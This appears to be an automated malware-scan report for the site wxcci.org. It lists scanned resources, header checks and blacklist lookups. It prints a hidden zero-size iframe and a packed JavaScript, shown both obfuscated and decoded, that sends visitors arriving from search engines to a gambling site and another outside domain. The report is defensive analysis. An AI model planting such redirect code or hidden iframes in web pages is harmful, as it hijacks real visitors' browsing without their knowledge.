Scanned pages/files
Request | Server response | Status |
http://wxcci.org/ | 200 OK Content-Length: 21358 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://www.wxcci.org/do/hack.php?hack=login&styletype=blue&iframeid=toplogin <iframe src="http://www.wxcci.org/do/hack.php?hack=login&styletype=blue&iframeid=toplogin" width=0 height=0> | ||
http://count31.51yes.com/click.aspx?id=310940343&logo=1 | 200 OK Content-Length: 1777 Content-Type: text/html | clean |
http://count31.51yes.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://api.discuz.com.de/Seo.js | 200 OK Content-Length: 702 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[02-79a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3(4.7.9(\'a\')==-1){0 2=new Date();2.setTime(2.getTime()+8);4.7=\'a=1;expires=\'+2.toGMTString();0 b=4.referrer;0 5=[\'baidu\',\'google\',\'yahoo\',\'bing\',\'soso\',\'sogou\',\'360.cn\',\'so.c\',\'youdao\',\'anquan\'];for(0 i in 5){3(b.9(5[i])!=-1){3(d.6.e){d.6.e.f=\'g://www.bocai.ch/\'};6.f.href=\'g://cnrdn.c/AtDE\'}}}',[],17,'var||exp|if|document|bot|window|cookie||indexOf|whoami|ref|com|parent|opener|location|http'.split('|'),0,{})) Decoded script: if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}} if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}} | ||
http://www.wxcci.org/images/default/inc.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.wxcci.org/images/default/default.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.wxcci.org/images/default/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/default/jquery-1.2.6.min.js | 200 OK Content-Length: 91327 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/blue/sliding.js | 200 OK Content-Length: 316 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/default/rollpic.js | 200 OK Content-Length: 6435 Content-Type: application/x-javascript | clean |
http://pw.cnzz.com/c.php?id=82460757 | 200 OK Content-Length: 9323 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wxcci.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 01:07:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
Set-Cookie: USR=ehojdrsz%090%091405991240%09http%3A%2F%2Fwxcci.org%2Findex.php; expires=Wed, 23-Jul-2014 01:07:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.10
GET / HTTP/1.1
Host: wxcci.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 01:07:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
Set-Cookie: USR=ehojdrsz%090%091405991240%09http%3A%2F%2Fwxcci.org%2Findex.php; expires=Wed, 23-Jul-2014 01:07:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.10
Second query (visit from search engine):
GET / HTTP/1.1
Host: wxcci.org
Referer: http://www.google.com/search?q=wxcci.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wxcci.org
Referer: http://www.google.com/search?q=wxcci.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wxcci.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wxcci.org/
Result: wxcci.org is not infected or malware details are not published yet.
Result: wxcci.org is not infected or malware details are not published yet.